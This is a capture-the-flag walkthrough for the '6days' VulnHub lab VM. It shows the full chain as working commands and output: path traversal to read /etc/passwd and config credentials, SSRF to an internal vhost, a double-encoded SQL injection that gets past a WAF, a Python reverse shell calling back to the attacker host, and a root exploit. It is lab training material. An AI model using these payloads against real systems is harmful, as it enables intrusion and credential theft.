6days WalkThrough

You can download the vm from here, the author is canyoupwnme

attack machine: 192.168.56.105  
target machine: 192.168.56.101  

Use Nmap:

root@evilc:/vulnhub/6days# nmap -sV -T4 192.168.56.101

Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-25 14:12 EDT  
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers  
Nmap scan report for 192.168.56.101  
Host is up (0.00015s latency).  
Not shown: 997 closed ports  
PORT     STATE    SERVICE    VERSION  
22/tcp   open     ssh        OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)  
80/tcp   open     http       Apache httpd 2.2.22 ((Ubuntu))  
8080/tcp filtered http-proxy  
MAC Address: 08:00:27:0B:78:6D (Oracle VirtualBox virtual NIC)  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds  

Check port 80, find a website:
I try to use NONEEDFORPENTEST as promocode, but get a expired response
Ok, just leave this part for a while, because I see an image wasn't load successfully, Check the source code:

<html>  
<head>  
<title>Rashomon IPS - Main Page</title>  
</head>  
<body>  
<h2>Rashomon Intrusion Prevention System</h2>  
<h3>Become immune to every attack!</h3>  
Today we're announcing our brand new product, Rashomon IPS! <br />  
It's capable of blocking any <b>sophisticated cyber attack</b> which <u>can harm your precious customers.</u> (you don't want THAT to happen, do you?) <br />  
<img src="http://192.168.56.101/image.php?src=https%3A%2f%2f4.bp.blogspot.com%2f-u8Jo4CEKQLk%2fV4OpiaoMJ7I%2fAAAAAAAAAiw%2f8kuCpTOpRWUAdp2p4GpegWdnOwxjwHNYQCLcB%2fs1600%2fphoto.jpg" /> <br />  
(This guy is coming after your website!) <br />
<br />  
Don't waste your time and money by hiring <font color="#ff00cc">pentesters</font> and doing real security audits. <br />  
This is the best way to secure your organization and you can completely rely on it, and only it! <br />  
<br />  
IT'S SO SECURE WE EVEN USE IT ON OUR WEBSITE. <br />  
<br />  
So be quick and get a <u>%15 discount</u> on our newest product using the promocode <b>NONEEDFORPENTEST</b>. (discount will be available until yesterday)<br />  
<br />  
<form name="promo" method="GET" action="checkpromo.php">  
Apply your promo code here: <input type="text" name="promocode">  
<input type="submit" value="Apply Promo">  
</form>  
</body>  
</html>  

OK, it requests resources from external network, but I limit the vm network access. But I do find something interesting:
This URL use a ?src to request resources, I wonder whether there is a LFI or RFI, check it and bingo:
LFI

root@evilc:/vulnhub/6days# curl -v http://192.168.56.101/image.php?src=../../../../etc/passwd  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=../../../../etc/passwd HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 15:47:35 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 1142  
< Content-Type: image/jpeg  
<  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
libuuid:x:100:101::/var/lib/libuuid:/bin/sh  
syslog:x:101:103::/home/syslog:/bin/false  
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false  
messagebus:x:103:106::/var/run/dbus:/bin/false  
whoopsie:x:104:107::/nonexistent:/bin/false  
landscape:x:105:110::/var/lib/landscape:/bin/false  
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin  
user:x:1000:1000:user,,,:/home/user:/bin/bash  
andrea:x:1001:1001::/home/andrea:/bin/andrea  
* Connection #0 to host 192.168.56.101 left intac

Notice there are two users: user and andrea.
RFI

root@evilc:/var/www/html# touch fool.txt  
root@evilc:/var/www/html# echo "hello world" > fool.txt  
root@evilc:/var/www/html# service apache  
apache2              apache-htcacheclean  
root@evilc:/var/www/html# service apache  
apache2              apache-htcacheclean  
root@evilc:/var/www/html# service apache2 start  
root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=http://192.168.56.105/fool.txt  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://192.168.56.105/fool.txt HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 15:50:28 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 12  
< Content-Type: image/jpeg  
<  
hello world  
* Connection #0 to host 192.168.56.101 left intact
root@evilc:/var/www/html#  

It seems I can read files thourgh this URL, So I check other php files:

root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=checkpromo.php  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=checkpromo.php HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 15:51:30 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 565  
< Content-Type: image/jpeg  
<  
<?php  
include 'config.php';

$conn = mysql_connect($servername, $username, $password);

if (!$conn) {  
    die("Connection failed: " . $conn->connect_error);
}

$sql = "SELECT discount, status FROM promocodes WHERE promocode='".$_GET['promocode']."';";

mysql_select_db($dbname);  
$result = mysql_query($sql, $conn);

if (!$result) {  
    echo "Promocode not valid!";
} else {
    while($row = mysql_fetch_array($result, MYSQL_ASSOC))
    {
        if($row['status'] == 0)
            echo "Code expired!";
        else
            echo "You have %".$row['discount']." discount!";
    }
}

mysql_close($conn);  
?>
* Connection #0 to host 192.168.56.101 left intact

Notice that in http response, the content type is image, that's the reason I can execute my php reverse shell through RFI.

root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=image.php  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=image.php HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 15:53:09 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 82  
< Content-Type: image/jpeg  
<  
<?php  
$img = $_GET['src'];
header('Content-Type: image/jpeg');  
readfile($img);  
?>
* Connection #0 to host 192.168.56.101 left intact

But I do find something useful.

root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=config.php  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=config.php HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 15:52:42 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 114  
< Content-Type: image/jpeg  
<  
<?php  
$servername = "localhost";
$username = "sellingstuff";
$password = "n0_\$\$_n0_g41ns";
$dbname = "fancydb";
* Connection #0 to host 192.168.56.101 left intact

The database name is fancydb, and I know hte username and passowrd, although the port for database is closed, I may try some SQL injection methods.

I return to the promocode check function, I thought there must be a SQLi vulnerablility, it seems the waf can detect SQLi:

root@evilc:/var/www/html# curl -v "http://192.168.56.101/checkpromo?promocode=NONEEDFORPENTEST'"  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /checkpromo?promocode=NONEEDFORPENTEST' HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Sat, 02 Jul 2016 07:26:13 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: RashomonIDS/v0.1  
< Content-Length: 40  
< Keep-Alive: timeout=5, max=100  
< Connection: Keep-Alive  
< Content-Type: text/html  
<  
Malicious request blocked!  
* Connection #0 to host 192.168.56.101 left intact
~Rashomon IPS

I try some methods to bypass, but nothing right. Then I recheck the Nmap result, a http 8080 port is open, the service name is http-proxy.
well, Check the Apache configuration:

root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=/etc/apache2/sites-available/default  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=/etc/apache2/sites-available/default HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 16:00:15 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 952  
< Content-Type: image/jpeg  
<  
<VirtualHost *:8080>  
    ServerAdmin webmaster@localhost

    DocumentRoot /var/www
    <Directory />
        Options FollowSymLinks
        AllowOverride None
    </Directory>
    <Directory /var/www/>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order allow,deny
        allow from all
    </Directory>

    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
    <Directory "/usr/lib/cgi-bin">
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        Order allow,deny
        Allow from all
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel warn

    CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>  
* Connection #0 to host 192.168.56.101 left intact

There is a virtual host on port 8080.
emmmmmmm.......
Try this:

root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=http://127.0.0.1:8080/index.php  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://127.0.0.1:8080/index.php HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 16:02:18 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 1274  
< Content-Type: image/jpeg  
<  
<html>  
<head>  
<title>Rashomon IPS - Main Page</title>  
</head>  
<body>  
<h2>Rashomon Intrusion Prevention System</h2>  
<h3>Become immune to every attack!</h3>  
Today we're announcing our brand new product, Rashomon IPS! <br />  
It's capable of blocking any <b>sophisticated cyber attack</b> which <u>can harm your precious customers.</u> (you don't want THAT to happen, do you?) <br />  
<img src="http://192.168.56.101/image.php?src=https%3A%2f%2f4.bp.blogspot.com%2f-u8Jo4CEKQLk%2fV4OpiaoMJ7I%2fAAAAAAAAAiw%2f8kuCpTOpRWUAdp2p4GpegWdnOwxjwHNYQCLcB%2fs1600%2fphoto.jpg" /> <br />  
(This guy is coming after your website!) <br />
<br />  
Don't waste your time and money by hiring <font color="#ff00cc">pentesters</font> and doing real security audits. <br />  
This is the best way to secure your organization and you can completely rely on it, and only it! <br />  
<br />  
IT'S SO SECURE WE EVEN USE IT ON OUR WEBSITE. <br />  
<br />  
So be quick and get a <u>%15 discount</u> on our newest product using the promocode <b>NONEEDFORPENTEST</b>. (discount will be available until yesterday)<br />  
<br />  
<form name="promo" method="GET" action="checkpromo.php">  
Apply your promo code here: <input type="text" name="promocode">  
<input type="submit" value="Apply Promo">  
</form>  
</body>  
</html>  
* Connection #0 to host 192.168.56.101 left intact

Nice, I can access the page through this virtual host.
Then I try SQL injection:

root@evilc:/var/www/html# curl -v "http://192.168.56.101/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=1'"  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=1' HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Sat, 02 Jul 2016 07:26:13 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: RashomonIDS/v0.1  
< Content-Length: 40  
< Keep-Alive: timeout=5, max=100  
< Connection: Keep-Alive  
< Content-Type: text/html  
<  
Malicious request blocked!  
* Connection #0 to host 192.168.56.101 left intact
~Rashomon IPS

Double encode tamper is work here:

root@evilc:/var/www/html# curl -v "http://192.168.56.101/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=1%2527"  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=1%2527 HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 16:04:19 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 20  
< Content-Type: image/jpeg  
<  
* Connection #0 to host 192.168.56.101 left intact
Promocode not valid!  

Then I construct this paylaod:

root@evilc:/# curl -v "http://192.168.56.101/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=%2527union%2ball%2bselect%2busername%2c2%2bfrom%2bfancydb.users%2523"  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=%2527union%2ball%2bselect%2busername%2c2%2bfrom%2bfancydb.users%2523 HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Tue, 25 Jul 2017 20:27:29 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 26  
< Content-Type: image/jpeg  
<  
* Connection #0 to host 192.168.56.101 left intact
You have %andrea discount!root@evilc:/#  
root@evilc:/# curl -v "http://192.168.56.101/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=%2527union%2ball%2bselect%2bpassword%2c2%2bfrom%2bfancydb.users%2523"  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=%2527union%2ball%2bselect%2bpassword%2c2%2bfrom%2bfancydb.users%2523 HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Tue, 25 Jul 2017 20:27:42 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 35  
< Content-Type: image/jpeg  
<  
* Connection #0 to host 192.168.56.101 left intact
You have %SayNoToPentests discount!  

Then I got a username and password pair:
andrea:SayNoToPentests

In /etc/passwd, we know there is a user in this system called andrea, so try ssh:

root@evilc:/vulnhub/6days# ssh andrea@192.168.56.101  
andrea@192.168.56.101's password:  
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Jul 26 19:06:20 EEST 2017

  System load:  0.0               Processes:           79
  Usage of /:   18.5% of 6.76GB   Users logged in:     0
  Memory usage: 9%                IP address for eth0: 192.168.56.101
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

New release '14.04.4 LTS' available.  
Run 'do-release-upgrade' to upgrade to it.


Your Hardware Enablement Stack (HWE) is supported until April 2017.

Last login: Tue Jul 25 23:32:12 2017 from 192.168.56.105  
andrea@cypm:~$  

But the bash is a rbash, we stuck in a jail, but we can use python:

andrea@cypm:~$ id  
andrea@cypm:~$ ls  
andrea@cypm:~$ cd ..  
rbash: cd: restricted  
andrea@cypm:~$ whereis python  
andrea@cypm:~$ ls -la  
andrea@cypm:~$ whoami  
andrea@cypm:~$ uname -a  
andrea@cypm:~$ cat

^Candrea@cypm:~$ wtf
rbash: /usr/bin/python: restricted: cannot specify `/' in command names  
andrea@cypm:~$ wtf  
rbash: /usr/bin/python: restricted: cannot specify `/' in command names  
andrea@cypm:~$ python  
Python 2.7.3 (default, Jun 22 2015, 19:43:34)  
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.  
>>> quit()
andrea@cypm:~$  

then we use python escape it:

andrea@cypm:~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.105",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'  

In another terminal:

andrea@cypm:~$ ls -la  
ls -la  
total 28  
drwxr-xr-x 3 andrea andrea 4096 Jul 26 19:11 .  
drwxr-xr-x 4 root   root   4096 Jul  2  2016 ..  
lrwxrwxrwx 1 root   root      9 Jul  2  2016 .bash_history -> /dev/null  
drwx------ 2 andrea andrea 4096 Jul 25 23:29 .cache  
-rwsrwxr-x 1 root   andrea 7452 Jul 11  2016 dog
-rwxr-xr-x 1 andrea andrea 7158 Jul 25 23:46 flag

In the hint, the author told us run the /flag file, and I check the uname of this machine, find an exploit for this machine.
But I found another way to get the final one:
final I know it's not a right way, I will figure out how to use the binary file dog execute the flag file in the future.


update:

use this exploit.
get the root shell:

andrea@cypm:~$ ls  
ls  
dog  
ofs.c  
andrea@cypm:~$ gcc pf^H  
gcc p  
gcc: error: p: No such file or directory  
gcc: fatal error: no input files  
compilation terminated.  
andrea@cypm:~$ gcc ofs.c -o ofs  
gcc ofs.c -o ofs  
andrea@cypm:~$ ./ofc  
./ofc
bash: ./ofc: No such file or directory  
andrea@cypm:~$ ./ofs  
./ofs
spawning threads  
mount #1  
mount #2  
child threads done  
/etc/ld.so.preload created
creating shared library  
# id
uid=0(root) gid=0(root) groups=0(root),1001(andrea)

Done, amazing.